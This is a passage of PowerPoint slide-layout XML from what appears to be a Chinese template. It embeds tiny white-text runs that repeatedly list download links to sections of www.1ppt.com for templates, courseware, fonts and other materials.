              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout85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85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85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85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85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85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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout85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85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85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85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8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86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86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86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86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86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86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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout86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86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86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86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87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87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87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87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87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87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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
